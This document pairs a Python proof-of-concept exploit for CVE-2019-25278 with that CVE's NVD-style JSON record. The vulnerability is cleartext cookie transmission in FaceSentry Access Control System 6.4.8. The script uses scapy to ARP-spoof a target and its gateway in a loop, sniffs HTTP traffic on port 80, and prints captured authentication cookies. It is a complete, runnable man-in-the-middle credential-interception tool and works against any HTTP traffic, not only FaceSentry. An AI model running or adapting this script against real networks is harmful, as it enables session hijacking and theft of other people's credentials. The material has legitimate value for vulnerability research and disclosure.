CVE-2019-25278

# CVE-2019-25278 PoC - Man-in-the-Middle Attack to Intercept Authentication Cookie # Target: FaceSentry Access Control System 6.4.8 # This PoC demonstrates credential interception via network sniffing import scapy.all as scapy from scapy.layers import http import netifaces def get_default_gateway(): """Get the default gateway IP address.""" gws = netifaces.gateways() return gws.get('default', {}).get(netifaces.AF_INET, (None, None))[0] def spoof_target(target_ip, spoof_ip, target_mac): """ARP spoof the target to redirect traffic through attacker.""" packet = scapy.Ether(dst=target_mac) / scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip) scapy.sendp(packet, verbose=False) def capture_http_cookies(packet): """Capture HTTP cookies from intercepted packets.""" if packet.haslayer(http.HTTPRequest): http_layer = packet.getlayer(http.HTTPRequest) host = http_layer.Host.decode('utf-8', 'ignore') if http_layer.Host else '' path = http_layer.Path.decode('utf-8', 'ignore') if http_layer.Path else '' # Check for Cookie header if packet.haslayer(scapy.Raw): payload = packet.getlayer(scapy.Raw).load.decode('utf-8', 'ignore') if 'Cookie:' in payload or 'cookie:' in payload: print(f"[*] HTTP Request to {host}{path}") print(f"[*] Cookie Found: {payload}") return payload return None def sniff_credentials(interface, target_ip, gateway_ip): """Sniff network traffic for authentication cookies.""" print(f"[*] Starting MITM attack against {target_ip}") print(f"[*] Gateway: {gateway_ip}") print(f"[*] Sniffing on interface: {interface}") # ARP spoofing target_mac = scapy.getmacbyip(target_ip) import threading def arp_spoof(): while True: spoof_target(target_ip, gateway_ip, target_mac) spoof_target(gateway_ip, target_ip, scapy.getmacbyip(gateway_ip)) spoof_thread = threading.Thread(target=arp_spoof, daemon=True) spoof_thread.start() # Sniff HTTP traffic scapy.sniff(iface=interface, store=False, prn=capture_http_cookies, filter='tcp port 80') if __name__ == "__main__": import sys if len(sys.argv) < 3: print("Usage: python cve_2019_25278_poc.py <target_ip> <interface>") print("Example: python cve_2019_25278_poc.py 192.168.1.100 eth0") sys.exit(1) target_ip = sys.argv[1] interface = sys.argv[2] gateway_ip = get_default_gateway() sniff_credentials(interface, target_ip, gateway_ip)

{"cve": {"id": "CVE-2019-25278", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:57.937", "lastModified": "2026-01-16T19:16:05.847", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "FaceSentry Access Control System 6.4.8 contains a cleartext transmission vulnerability that allows remote attackers to intercept authentication credentials. Attackers can perform man-in-the-middle attacks to capture HTTP cookie authentication information during network communication."}, {"lang": "es", "value": "El Sistema de Control de Acceso FaceSentry 6.4.8 contiene una vulnerabilidad de transmisión en texto claro que permite a atacantes remotos interceptar credenciales de autenticación. Los atacantes pueden realizar ataques man-in-the-middle para capturar información de autenticación de cookies HTTP durante la comunicación de red."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "C64B12CF-265E-4FD8-9BCF-95843E5A885B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "A6913639-EBF7-4451-9052-71DB2B3DF925"}, {"vulnerable": true, "criteria": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:6.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "26BA8B79-F65D-4D30-8827-B893F500BF8C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:iwt:facesentry_access_control_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "EFE14646-6ED5-46DC-8A19-4F2358F784E5"}]}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/163192", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://packetstormsecurity.com/files/153498", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5528.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}